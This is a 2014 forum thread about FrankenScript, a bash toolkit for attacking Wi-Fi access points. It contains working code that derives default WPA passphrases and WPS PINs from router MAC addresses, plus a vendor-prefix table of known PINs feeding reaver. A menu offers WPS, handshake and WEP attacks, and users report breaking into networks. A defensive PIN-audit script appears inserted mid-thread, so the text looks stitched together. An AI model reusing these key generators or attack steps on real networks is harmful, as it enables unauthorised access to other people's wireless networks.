# 3) Vodafone-XXXX Arcadyan Essid,PIN WPS and WPA Key Generator by Coeman76 from lampiweb team (www.lampiweb.com)
#
# Thanks to the three of them for their dedication and passion and for delivering full disclosure and free code
# This function is based on the script easybox_keygen.sh previously mentioned
# # The quotations from the original work start with double dash and are between quotes
# Some variables and lines are changed for a better integration and I add the PIN calculation and Coeman trick for default WPA
# the lines quoted with six dash and "unchanged" are exactly the same than in easybox_keygen like this "######unchanged"


# This function requires $BSSID which is the mac address ( hex may format XX:XX:XX:XX:XX:XX)
# It will return $DEFAULTSSID, with essid by default, the wpa passphrase ($DEFAULTWPA) and $STRING, the 7 first digits of our PIN, ready to use in CHECKSUM to
# give the full WPS PIN ($PIN)

## "Take the last 2 Bytes of the MAC-Address (0B:EC), and convert it to decimal." < original quote from easybox_keygen.sh
deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g')) # suppression of $take5 and $last4 compared with easybox code, the job is directly done in the array value assignation, also the variable $MAC has been replaced by $BSSID that is used in WPSPIN
## "The digits M9 to M12 are just the last digits (9.-12.) of the MAC:" < original quote from easybox_keygen.sh
hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g')) ######unchanged
## K1 = last byte of (d0 + d1 + h2 + h3) < original quote from easybox_keygen.sh
## K2 = last byte of (h0 + h1 + d2 + d3) < original quote from easybox_keygen.sh
c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]}) ######unchanged
c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]}) ######unchanged
K1=$((($c1)%16)) ######unchanged
K2=$((($c2)%16)) ######unchanged
X1=$((K1^${deci[3]})) ######unchanged
X2=$((K1^${deci[2]})) ######unchanged
X3=$((K1^${deci[1]})) ######unchanged
Y1=$((K2^0x${hexi[1]})) ######unchanged
Y2=$((K2^0x${hexi[2]})) ######unchanged
Y3=$((K2^0x${hexi[3]})) ######unchanged
Z1=$((0x${hexi[2]}^${deci[3]})) ######unchanged
Z2=$((0x${hexi[3]}^${deci[2]})) ######unchanged
Z3=$((K1^K2)) ######unchanged
STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev) # this to generate later our PIN, the 7 first digits
DEFAULTWPA=$(printf "%x%x%x%x%x%x%x%x%x\n" $X1 $Y1 $Z1 $X2 $Y2 $Z2 $X3 $Y3 $Z3 | tr a-f A-F | tr 0 1) # the change respected to the original script in the most important thing, the default pass, is the adaptation of Coeman76's work on Spanish Vodafone where he found out that no 0 were used in the final pass
CHECKSUM
}



I put you back CHECKSUM in case it helps you


CHECKSUM(){ # The function checksum was written for bash by antares_145 from crack-wifi.com
PIN=`expr 10 '*' $STRING` # We will have to define first the string $STRING (the 7 first number of the WPS PIN)
ACCUM=0 # to get a result using this function)

ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'` # multiplying the first number by 3, the second by 1, the third by 3 etc....
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'` # so we follow the pattern for our seven number

DIGIT=`expr $ACCUM '%' 10` # we define our digit control: the sum reduced with base 10 to the unit number
CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10` # the checksum is equal to " 10 minus digit control "

PIN=$(printf '%08d\n' `expr $PIN '+' $CHECKSUM`) # Some zero-padding in case that the value of the PIN is under 10000000
} # STRING + CHECKSUM gives the full WPS PIN




feel free to use the code and if you have any question about it do not hesitate to ask


cheers :)

slim76
2014-01-30, 03:07
I made an update of wpspin and I implemented the algorithm corrected in bash in a function called arcadyan

I just simplified and corrected the bash code for the WPA from wotan and used it for the PIN with the same variables
You "feed it" with $BSSID which is the mac address of the target in original format XX:XX:XX:XX:XX:XX
It gives you back $DEFAULTWPA with the WPA passphrase and $STRING which are the 7 numbers of the PIN
then it calls $CHECKSUM that you already have implemented in your script to generate the full PIN (variable $PIN )

feel free to use the code and if you have any question about it do not hesitate to ask

cheers :)

Nice work matey.
I know you said feel free to ask any questions, but I was wondering if I could go a step further and ask if you would be able to correct the script for me please. :-)
I'm sorry to ask, I'm still very new to this sort of thing. LOL
If you can, please feel free to add any credits or such.



#!/bin/bash
#
#
#
#####################################################################

AP_essid=$(cat $HOME/FrankenScript/Scripts/AP_essid.txt)
AP_bssid=$(cat $HOME/FrankenScript/Scripts/AP_bssid.txt)
ESSID=$(echo $AP_essid)
BSSID=$(echo $AP_bssid)

#####################################################################

FUNC_CHECKSUM(){
ACCUM=0

ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`

DIGIT=`expr $ACCUM '%' 10`
CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10`

PIN=`expr $PIN '+' $CHECKSUM`
ACCUM=0

ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1 ')' '%' 10 ')'`

RESTE=`expr $ACCUM '%' 10`
}

CHECKBSSID=$(echo $BSSID | cut -d ":" -f1,2,3 | tr -d ':')

FINBSSID=$(echo $BSSID | cut -d ':' -f4-)

MAC=$(echo $FINBSSID | tr -d ':')

CONVERTEDMAC=$(printf '%d\n' 0x$MAC)

FINESSID=$(echo $ESSID | cut -d '-' -f2)

PAREMAC=$(echo $FINBSSID | cut -d ':' -f1 | tr -d ':')

CHECKMAC=$(echo $FINBSSID | cut -d ':' -f2- | tr -d ':')

MACESSID=$(echo $PAREMAC$FINESSID)

STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'`

PIN=`expr 10 '*' $STRING`

FUNC_CHECKSUM

PINWPS1=$(printf '%08d\n' $PIN)

STRING2=`expr $STRING '+' 8`
PIN=`expr 10 '*' $STRING2`

FUNC_CHECKSUM

PINWPS2=$(printf '%08d\n' $PIN)

STRING3=`expr $STRING '+' 14`
PIN=`expr 10 '*' $STRING3`

FUNC_CHECKSUM

PINWPS3=$(printf '%08d\n' $PIN)

if [[ $ESSID =~ ^FTE-[[:xdigit:]]{4}[[:blank:]]*$ ]] && [[ "$CHECKBSSID" = "04C06F" || "$CHECKBSSID" = "202BC1" || "$CHECKBSSID" = "285FDB" || "$CHECKBSSID" = "80B686" || "$CHECKBSSID" = "84A8E4" || "$CHECKBSSID" = "B4749F" || "$CHECKBSSID" = "BC7670" || "$CHECKBSSID" = "CC96A0" ]] && [[ $(printf '%d\n' 0x$CHECKMAC) = `expr $(printf '%d\n' 0x$FINESSID) '+' 7` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 1` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 7` ]];

then

CONVERTEDMACESSID=$(printf '%d\n' 0x$MACESSID)

RAIZ=`expr '(' $CONVERTEDMACESSID '%' 10000000 ')'`

STRING4=`expr $RAIZ '+' 7`

PIN=`expr 10 '*' $STRING4`

FUNC_CHECKSUM

PINWPS4=$(printf '%08d\n' $PIN)

echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS4 "
PIN4REAVER=$PINWPS4
else
case $CHECKBSSID in
04C06F | 202BC1 | 285FDB | 80B686 | 84A8E4 | B4749F | BC7670 | CC96A0)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1
$RED"Other Possible Pin"$RED:$STAND $PINWPS2
$RED"Other Possible Pin"$RED:$STAND $PINWPS3"
PIN4REAVER=$PINWPS1
;;
001915)
echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670"
PIN4REAVER=12345670
;;
404A03)
echo -e "$RED"Other Possible Pin"$RED:$STAND 11866428"
PIN4REAVER=11866428
;;
F43E61 | 001FA4)
echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670"
PIN4REAVER=12345670
;;
001A2B)
if [[ $ESSID =~ ^WLAN_[[:xdigit:]]{4}[[:blank:]]*$ ]];
then
echo -e "$RED"Other Possible Pin"$RED:$STAND 88478760"
PIN4REAVER=88478760
else
echo -e "PIN POSSIBLE... > $PINWPS1"
PIN4REAVER=$PINWPS1
fi
;;
3872C0)
if [[ $ESSID =~ ^JAZZTEL_[[:xdigit:]]{4}[[:blank:]]*$ ]];
then
echo -e "$RED"Other Possible Pin"$RED:$STAND 18836486"
PIN4REAVER=18836486
else
echo -e "PIN POSSIBLE > $PINWPS1"
PIN4REAVER=$PINWPS1
fi
;;
FCF528)
echo -e "$RED"Other Possible Pin"$RED:$STAND 20329761"
PIN4REAVER=20329761
;;
3039F2)
echo -e "several possible PINs, ranked in order>
16538061 16702738 18355604 88202907 73767053 43297917"
PIN4REAVER=16538061
;;
A4526F)
echo -e "several possible PINs, ranked in order>
16538061 88202907 73767053 16702738 43297917 18355604 "
PIN4REAVER=16538061
;;
74888B)
echo -e "several possible PINs, ranked in order>
43297917 73767053 88202907 16538061 16702738 18355604"
PIN4REAVER=43297917
;;
DC0B1A)
echo -e "several possible PINs, ranked in order>
16538061 16702738 18355604 88202907 73767053 43297917"
PIN4REAVER=16538061
;;
5C4CA9 | 62A8E4 | 62C06F | 62C61F | 62E87B | 6A559C | 6AA8E4 | 6AC06F | 6AC714 | 6AD167 | 72A8E4 | 72C06F | 72C714 | 72E87B | 723DFF | 7253D4)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1 "
PIN4REAVER=$PINWPS1
;;
002275)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
PIN4REAVER=$PINWPS1
;;
08863B)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
PIN4REAVER=$PINWPS1
;;
001CDF)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
PIN4REAVER=$PINWPS1
;;
00A026)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
PIN4REAVER=$PINWPS1
;;
5057F0)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
PIN4REAVER=$PINWPS1
;;
C83A35 | 00B00C | 081075)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
PIN4REAVER=$PINWPS1
;;
E47CF9 | 801F02)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
PIN4REAVER=$PINWPS1
;;
0022F7)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
PIN4REAVER=$PINWPS1
;;
*)
PIN4REAVER=$PINWPS1
;;
esac
fi
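
The check digit and the MAC-derived PIN body that the script above computes also let an administrator test whether the WPS PIN on their own AP is predictable from what the AP broadcasts. The following is an added example, not part of FrankenScript or WPSPIN; the function names, verdict strings and sample BSSID/PIN pairs are constructed for illustration, and 12345670 is the static value the script above lists.

```shell
#!/bin/sh
# Added example (not FrankenScript or WPSPIN code). POSIX sh, also runs in bash.
# Audits the label PIN of an AP you administer: is the check digit valid, and
# is the PIN a known static value or derivable from the BSSID?

# Print the check digit for a 7-digit PIN body (weights 3,1,3,1,3,1,3, the same
# pattern as the CHECKSUM function in the thread). Digits are read one character
# at a time, so a body such as 0000042 is never parsed as an octal number.
wps_check_digit() {
    wcd_rest=$1 wcd_acc=0 wcd_w=3
    case $wcd_rest in ''|*[!0-9]*) return 2 ;; esac
    [ "${#wcd_rest}" -eq 7 ] || return 2
    while [ -n "$wcd_rest" ]; do
        wcd_d=${wcd_rest%"${wcd_rest#?}"}   # first character
        wcd_rest=${wcd_rest#?}              # drop it
        wcd_acc=$(( $wcd_acc + $wcd_w * $wcd_d ))
        wcd_w=$(( 4 - $wcd_w ))             # alternate 3,1,3,...
    done
    echo $(( (10 - $wcd_acc % 10) % 10 ))
}

# Succeed only for exactly 8 digits whose last digit matches the check digit.
# An unpadded value such as 420 is rejected instead of being silently accepted.
wps_pin_valid() {
    case $1 in ''|*[!0-9]*) return 1 ;; esac
    [ "${#1}" -eq 8 ] || return 1
    [ "$(wps_check_digit "${1%?}")" = "${1#???????}" ]
}

# PIN body = last three BSSID bytes as a number, modulo 10^7, zero-padded to
# 7 digits (the derivation used for $STRING in the script above), plus check digit.
mac_derived_pin() {
    md_hex=$(printf '%s' "$1" | tr -d ':')
    case $md_hex in ''|*[!0-9A-Fa-f]*) return 2 ;; esac
    [ "${#md_hex}" -eq 12 ] || return 2
    md_body=$(printf '%07d' $(( 0x${md_hex#??????} % 10000000 )))
    printf '%s%s\n' "$md_body" "$(wps_check_digit "$md_body")"
}

# Verdicts (hypothetical names): invalid | bad-bssid | static-default |
# mac-derived | no-match. Anything but no-match means the PIN should not be
# relied on; disable WPS PIN mode or set a random PIN if the firmware allows it.
wps_pin_audit() {
    au_bssid=$1 au_pin=$2
    if ! wps_pin_valid "$au_pin"; then echo "invalid"; return 0; fi
    au_derived=$(mac_derived_pin "$au_bssid") || { echo "bad-bssid"; return 0; }
    if [ "$au_pin" = 12345670 ]; then echo "static-default"; return 0; fi
    if [ "$au_pin" = "$au_derived" ]; then
        echo "mac-derived"
    else
        echo "no-match"
    fi
}

# Constructed sample inventory: "BSSID label-PIN" (not real devices).
while read -r bssid pin; do
    printf '%s %s -> %s\n' "$bssid" "$pin" "$(wps_pin_audit "$bssid" "$pin")"
done <<'EOF'
00:11:22:00:00:2A 00000420
00:11:22:00:00:2A 420
00:11:22:12:34:56 11930464
00:11:22:12:34:56 12345670
00:11:22:12:34:56 48261357
EOF
```
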

kcdtv
2014-01-30, 09:41
you should collect the arcadyan mac to redact your case in condition


;;
XXXXXX | XXXXXX)

where you have the X you put the 6 first digits of the arcadyan mac without the 2 points

and then you generate string


deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g'))
hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g'))
c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]})
c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]})
K1=$((($c1)%16))
K2=$((($c2)%16))
X1=$((K1^${deci[3]}))
X2=$((K1^${deci[2]}))
X3=$((K1^${deci[1]}))
Y1=$((K2^0x${hexi[1]}))
Y2=$((K2^0x${hexi[2]}))
Y3=$((K2^0x${hexi[3]}))
Z1=$((0x${hexi[2]}^${deci[3]}))
Z2=$((0x${hexi[3]}^${deci[2]}))
Z3=$((K1^K2))
STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev)

then you generate the checksum to get the full PIN


PIN=`expr 10 '*' $STRING`
FUNC_CHECKSUM
PIN4REAVER=$(printf '%08d\n' $PIN)


that will give you


;;
XXXXXX | XXXXXX)
deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g'))
hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g'))
c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]})
c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]})
K1=$((($c1)%16))
K2=$((($c2)%16))
X1=$((K1^${deci[3]}))
X2=$((K1^${deci[2]}))
X3=$((K1^${deci[1]}))
Y1=$((K2^0x${hexi[1]}))
Y2=$((K2^0x${hexi[2]}))
Y3=$((K2^0x${hexi[3]}))
Z1=$((0x${hexi[2]}^${deci[3]}))
Z2=$((0x${hexi[3]}^${deci[2]}))
Z3=$((K1^K2))
STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev)
PIN=`expr 10 '*' $STRING`
FUNC_CHECKSUM
PIN4REAVER=$(printf '%08d\n' $PIN)


that you have to place in your case esac sentence, anywhere until it is before

;;
*)

slim76
2014-01-30, 12:36
Sorry mate, I meant would you be able to amend the script I posted so I only have to paste it back into FrankenScript.

I know it's kinda cheeky to ask, sorry. :-)

I've been in stupid mode for the last few days and I'm having trouble following even simple things. LOL

kcdtv
2014-01-31, 08:30
;)

At least explain me more what you want to do, how you want to call the variables, where it is supposed to go, for what...
you want to generate the PIN for all devices or just for arcadyan?
( it seems that the arcadyan algorithm is used by Askey on some models :confused: if i get confirmation of this i will post it here
cheers

slim76
2014-01-31, 11:29
;)

At least explain me more what you want to do, how you want to call the variables, where it is supposed to go, for what...
you want to generate the PIN for all devices or just for arcadyan?
( it seems that the arcadyan algorithm is used by Askey on some models :confused: if i get confirmation of this i will post it here
cheers

Would it be possible to have it setup like the one I posted above (In a separate script), and have it generate the pin for all devices.
Then I can put the script into a folder rather than putting it directly into FrankenScript.

Many thanks matey. :D

slim76
2014-02-06, 15:19
Updated FrankenScript to 3.2.

brazen
2014-02-06, 21:52
Slim,

at different points when I have to click [enter] to start a scan, a second terminal window opens then closes again quickly. I just downloaded 3.2 and it is still doing it.

slim76
2014-02-06, 23:07
Slim,

at different points when I have to click [enter] to start a scan, a second terminal window opens then closes again quickly. I just downloaded 3.2 and it is still doing it.

Can you provide more details please mate, I need to know exactly where it happens.

If anyone else is having issues please post the details and I'll look into it.

brazen
2014-02-06, 23:25
root@kali:~# cd FrankenScript/
root@kali:~/FrankenScript# ./FrankenScript.sh


#########################################
# FrankenScript #
#########################################
# #
# [1] Interface Selection #
# [2] System Mode Selection #
# [3] Attack A WPS Enabled Access Point #
# [4] Capture WPA/WPA2 Handshake #
# [5] WEP Attacks #
# [6] Attack Handshake.cap Files #
# [7] Show Recovered Passkeys #
# [8] Recovered Passkey Checker #
# #
#########################################

Chosen Interface:
System Mode: Networking Mode Is Enabled
MAC address for mon0:

Please choose an option?: 3




Scan for WPS enabled access points.
Press Ctrl+c on the wash screen to stop the scan and to choose a target.
Press [Enter] to launch the scan.

Please wait...

[ I THINK THIS IS WHERE THE SECOND WINDOW OPENS FOR HALF A SECOND AND THEN CLOSES AND I AM BACK TO THE PRIMARY WINDOW]

Available Access Points.



Please input the number of your chosen target:

slim76
2014-02-06, 23:28
root@kali:~# cd FrankenScript/
root@kali:~/FrankenScript# ./FrankenScript.sh


#########################################
# FrankenScript #
#########################################
# #
# [1] Interface Selection #
# [2] System Mode Selection #
# [3] Attack A WPS Enabled Access Point #
# [4] Capture WPA/WPA2 Handshake #
# [5] WEP Attacks #
# [6] Attack Handshake.cap Files #
# [7] Show Recovered Passkeys #
# [8] Recovered Passkey Checker #
# #
#########################################

Chosen Interface:
System Mode: Networking Mode Is Enabled
MAC address for mon0:

Please choose an option?: 3

Scan for WPS enabled access points.
Press Ctrl+c on the wash screen to stop the scan and to choose a target.
Press [Enter] to launch the scan.

Please wait...

[ I THINK THIS IS WHERE THE SECOND WINDOW OPENS FOR HALF A SECOND AND THEN CLOSES AND I AM BACK TO THE PRIMARY WINDOW]

Available Access Points.

Please input the number of your chosen target:

Hmmm, did the wash scan work ok?

brazen
2014-02-06, 23:29
slim... this may just be me... see below... it worked correctly this time when i chose to disable processes that might cause issues: Y

********************************************

Please choose an option?: 1




Available WiFi Adapters.
########################

1: wlan0

Please input the number of your chosen WiFi adapter: 1

#########################################
# FrankenScript #
#########################################
# #
# [1] Interface Selection #
# [2] System Mode Selection #
# [3] Attack A WPS Enabled Access Point #
# [4] Capture WPA/WPA2 Handshake #
# [5] WEP Attacks #
# [6] Attack Handshake.cap Files #
# [7] Show Recovered Passkeys #
# [8] Recovered Passkey Checker #
# #
#########################################

Chosen Interface: wlan0
System Mode: Networking Mode Is Enabled
MAC address for mon0:

Please choose an option?: 2




What system mode would you like to set.
[1] = Put The System Into Networking Mode.
[2] = Put The System Into Attack Mode.
[3] = Return To Menu.
1, 2 or 3?: 2

Would you like to disable processes that might cause issues y/n?: y

Would you like to disable NetworkManager y/n?: y

Would you like to disable wpa_supplicant y/n?: y

Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID Name
3051 dhclient
3057 dhclient


Interface Chipset Driver

wlan0 Broadcom b43 - [phy0]
(monitor mode enabled on mon0)


Permanent MAC: b8:8d:12:30:6b:f2 (unknown)
Current MAC: b8:8d:12:30:6b:f2 (unknown)
New MAC: 40:2d:60:68:79:8f (unknown)




#########################################
# FrankenScript #
#########################################
# #
# [1] Interface Selection #
# [2] System Mode Selection #
# [3] Attack A WPS Enabled Access Point #
# [4] Capture WPA/WPA2 Handshake #
# [5] WEP Attacks #
# [6] Attack Handshake.cap Files #
# [7] Show Recovered Passkeys #
# [8] Recovered Passkey Checker #
# #
#########################################

Chosen Interface: wlan0
System Mode: Attack Mode Is Enabled
MAC address for mon0: 40:2d:60:68:79:8f

Please choose an option?: 3




Scan for WPS enabled access points.
Press Ctrl+c on the wash screen to stop the scan and to choose a target.
Press [Enter] to launch the scan.

slim76
2014-02-06, 23:32
Glad to hear it's working for you. You'll have to have a little play with it to get used to it and to find out what works for you.

So what are your opinions regarding FrankenScript? Anything you would like to see added to it?
All constructive criticism welcome. :-)

slim76
2014-02-09, 22:54
Due to the lack of feedback and interest I very much doubt that I'll be releasing any further updates or scripts.

shaberu
2014-02-10, 00:13
I'd like to see other things you release

TrashMan
2014-02-10, 06:55
I'm very interested in trying this out slim. and major props for making it

I will be testing it out tonight on BT5 R3 and see if it works. It should in theory since I have dhcp3 client / server and mdk3 already installed and up to date.

I am also installing kali right now on another USB stick so we'll see how this goes.

Once again thanks for this major works. I looked at the script and it is huge. One of the largest I've ever seen next to Social engineering toolkit.

Cl0th0
2014-02-10, 20:23
Hi slim,

I finally have time to try your script in the weekend with WPS attack option for my TP-Link N750 router. Your script worked great, wash has no problem to find wps enabled APs and options for reaver is easy to incorporate. Just my router locked out easily but your mdk3 options come in handy to reset it. I think it's just a matter of time for me to attack my router successfully.

Your script is great to put many tools together for pentesting APs. I have yet to try attacking handshakes with your script.... can't wait to see your new update!

:D

slim76
2014-02-10, 23:32
I've already updated option 6 again, it now supports drag and drop a wordlist or directory containing multiple wordlists.
Not sure if I'm going upload it for everyone though, but I guess time will tell.

soxrok2212
2014-02-11, 00:02
Hi slim,

I finally have time to try your script in the weekend with WPS attack option for my TP-Link N750 router. Your script worked great, wash has no problem to find wps enabled APs and options for reaver is easy to incorporate. Just my router locked out easily but your mdk3 options come in handy to reset it. I think it's just a matter of time for me to attack my router successfully.

Your script is great to put many tools together for pentesting APs. I have yet to try attacking handshakes with your script.... can't wait to see your new update!

:D

Thanks for testing MDK3 for me hahahah... I haven't had time to test it but I guess it's working! Good job slim!

mmusket33
2014-03-24, 02:45
To soxrox 2212

Any chance you could send us version 2. We tried kali-linux win7 and XP for hours.

Muskt Team A

soxrok2212
2014-03-24, 23:12
To soxrox 2212

Any chance you could send us version 2. We tried kali-linux win7 and XP for hours.

Muskt Team A

Version 2 of what?

mmusket33
2014-03-25, 00:45
Sorry Soxrox we were referring to FrankenScript-v3.2 our mistake. We are unable to download a copy where we are at present.

soxrok2212
2014-03-25, 01:51
Sorry Soxrox we were referring to FrankenScript-v3.2 our mistake. We are unable to download a copy where we are at present.

Sure I'll e-mail you it.

soxrok2212
2014-04-28, 21:39
Any more updates on the script coming?

slim76
2014-04-28, 23:05
Any more updates on the script coming?

It's changed a lot since I last posted it here, I've added new features, options, and tools. ;-)
People didn't want to leave any feedback so I stopped uploading it.
I can't fix things for others if they won't tell me what is and isn't working for them.

soxrok2212
2014-04-29, 02:02
It's changed a lot since I last posted it here, I've added new features, options, and tools. ;-)
People didn't want to leave any feedback so I stopped uploading it.
I can't fix things for others if they won't tell me what is and isn't working for them.

Guess I'll go do some bug hunting soon ;)

learning
2014-06-02, 17:31
slim76 just wanted to let you know that I really love your script and I would love to get the updated version of it. It owned a couple of Wifis in minutes so far with it :D

Quest
2014-06-03, 18:21
So was this script incorporated in 1.0.7?

How can we follow development of FrankenScript slim76? These forums are not the best way to get feedback from what I've noticed.

Anyways, continue the good work!!

soxrok2212
2014-06-03, 20:15
Slim, I was wondering if you could add a Belkin default password generator. Here is the git page from the developer (https://[email protected]/dudux/belkin4xx.git), safari tells me that there may be possible phishing on the site but I think its clean... Proceed with caution. The original thread is here. (https://forums.kali.org/showthread.php?18943-Belkin-SSID-and-WPA-WPA2-correlation) Let me know if you can get it working!

slim76
2014-06-03, 23:55
@ learning.
I'm currently rewriting a couple of the attack options, then I'll upload it.

@ Quest.
It's not included in Kali but you can download it from the first page, if the links are dead you can ask another member if they'll upload it for you, or you can wait for the updated version.

@ soxrok2212.
I added Belkin default password generator ages ago lol, I also added some others too. :-)

To all,
Will upload the new version when I've rewritten some of the options.

Quest
2014-06-04, 01:38
That is just great!

If someone that actually knows what he's doing can write a short Howto for that new version(to come) of FrankenScript, it will be appreciated. As obvious as some operations may seem to some of you, it is a complete mystery for others.

If some of you can 'torrent' it, It will facilitate accessibility for all.

Thank you for all the work Slim!! :) Hopefully it will make its way in the next Kali.

slim76
2014-06-04, 03:22
That is just great!

If someone that actually knows what he's doing can write a short Howto for that new version(to come) of FrankenScript, it will be appreciated. As obvious as some operations may seem to some of you, it is a complete mystery for others.

If some of you can 'torrent' it, It will facilitate accessibility for all.

Thank you for all the work Slim!! :) Hopefully it will make its way in the next Kali.

There's no need to torrent it as it's only a small file, and no need for a how-to either 'cause it's dummy proof. LOL

Quest
2014-06-04, 03:28
dummy proof is good! Torrent though might help you diffuse your work. Any ETA on the new version Slim?

slim76
2014-06-04, 11:13
dummy proof is good! Torrent though might help you diffuse your work. Any ETA on the new version Slim?

I've got a lot going on at the moment but hope to have it ready within the next few days if all goes well.

slim76
2014-06-10, 00:05
Here's the latest FrankenScript.

WHEN DOWNLOADING, DO NOT CLICK THE BIG DOWNLOAD BUTTON AT THE TOP OF THE PAGE.

FrankenScript2-10-06-2014.tar.gz
http://mir.cr/0HBX0O5C

Quest
2014-06-10, 01:23
some of the downloads are NOT FrankenScript2-10-06-2014.tar.gz But FrankenScript2-10-06-2014.tar.gz.exe (322*576 b).

The download should be 1*081*616 b in size, named FrankenScript2-10-06-2014.tar.gz, and not an exe.

Thank you Slim!!

Quest
2014-06-12, 00:19
So here's a little feedback.

It's working well, selecting the wifi adapter and starting wash. Then wash hangs (nothing to do with FS2, has to do with wash) on a certain router. From that point I cannot do anything but stop the process. So that's my feedback.

slim76
2014-06-12, 12:22
So here's a little feedback.

It's working well, selecting the wifi adapter and starting wash. Then wash hangs (nothing to do with FS2, has to do with wash) on a certain router. From that point I cannot do anything but stop the process. So that's my feedback.

Many thanks for the feedback.
I've never heard of that issue before, are you sure it's not something to do with your setup?
When wash hangs can you continue through the script if you press Ctrl+c on the wash screen?

Quest
2014-06-12, 13:55
Many thanks for the feedback.
I've never heard of that issue before, are you sure it's not something to do with your setup?
When wash hangs can you continue through the script if you press Ctrl+c on the wash screen?

that's because most know how scripts work, and install it in the right directory, 'Home'(root) folder. Mine was in a sub-folder of 'Home'. Now I know x/

Everything is working fine now. Wash and airodump-ng starts and give me the choice of the target. Vicious little **** you've created there Slim!!

I have not explored all possibilities yet. Some of the things I've noticed to maybe improve FS:

- console windows popping up is somewhat 'unpleasant', though no big deal, it must do what it's got to do, the functionalities matter the most, and I doubt that there's anything you can do about it, as FS calls different processes and they must have their own console window to operate in. Just pointing it out, as it is somewhat distracting when multitasking. Something like Wifite comes to mind here as a solution(?)

- I cannot surf on one wifi adapter and use FS2 on another at the same time. Or am I missing something again? Network manager must be off right?



Edit:
Swearing

Quest
2014-06-12, 17:27
- I cannot surf on one wifi adapter and use FS2 on another at the same time. Or am I missing something again? Network manager must be off right?
